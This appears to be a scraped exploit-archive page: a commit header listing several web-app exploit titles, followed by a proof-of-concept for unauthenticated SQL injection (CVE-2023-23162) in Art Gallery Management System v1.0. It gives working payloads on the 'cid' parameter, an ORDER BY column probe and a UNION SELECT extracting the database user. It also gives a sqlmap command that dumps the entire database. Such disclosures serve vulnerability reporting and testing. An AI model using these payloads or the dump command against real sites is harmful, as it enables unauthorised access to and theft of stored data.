91a0e53b65
9 changes to exploits/shellcodes/ghdb pfsenseCE v2.6.0 - Anti-brute force protection bypass Art Gallery Management System Project in PHP v 1.0 - SQL injection Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (sqli) authenticated Art Gallery Management System Project v1.0 - SQL Injection (sqli) Unauthenticated Art Gallery Management System Project in PHP v 1.0 - SQL injection Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS) Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated Art Gallery Management System Project v1.0 - SQL Injection (editid) authenticated Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) Bang Resto v1.0 - 'Multiple' SQL Injection Bang Resto v1.0 - Stored Cross-Site Scripting (XSS) pfsenseCE v2.6.0 - Anti-brute force protection bypass
28 lines
No EOL
1.6 KiB
Text
28 lines
No EOL
1.6 KiB
Text
# Exploit Title: Art Gallery Management System Project v1.0 - SQL Injection (cid) Unauthenticated
|
|
# Date: 20/01/2023
|
|
# Exploit Author: Rahul Patwari
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
|
|
# Version: 1.0
|
|
# Tested on: XAMPP / Windows 10
|
|
# CVE : CVE-2023-23162
|
|
|
|
# Proof of Concept:
|
|
|
|
# 1- Install The application Art Gallery Management System Project v1.0
|
|
# 2- Navigate to the product page by clicking on the "ART TYPE" by selecting any of the categories on the menu.
|
|
# 3- Now insert a single quote ( ' ) on "cid" parameter to break the database query, you will see the output is not shown.
|
|
# 4- Now inject the payload double single quote ('') in the "cid" parameter to merge the database query and after sending this request the SQL query is successfully performed and the product is shown in the output.
|
|
# 5- Now find how many columns are returned by the SQL query. this query will return 6 columns.
|
|
Payload:cid=1%27order%20by%206%20--%20-&artname=Sculptures
|
|
|
|
# 6- for manually getting data from the database insert the below payload to see the user of the database.
|
|
payload: cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
|
|
|
|
# 7- for automation using "SQLMAP" intercept the request and copy this request to a file called "request.txt".
|
|
# 8- now to get all database data use the below "sqlmap" command to fetch all the data.
|
|
Command: sqlmap -r request.txt -p cid --dump-all --batch
|
|
|
|
# Go to this url "
|
|
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=-2%27union%20select%201,2,3,user(),5,6--%20-&artname=Serigraphs
|
|
" |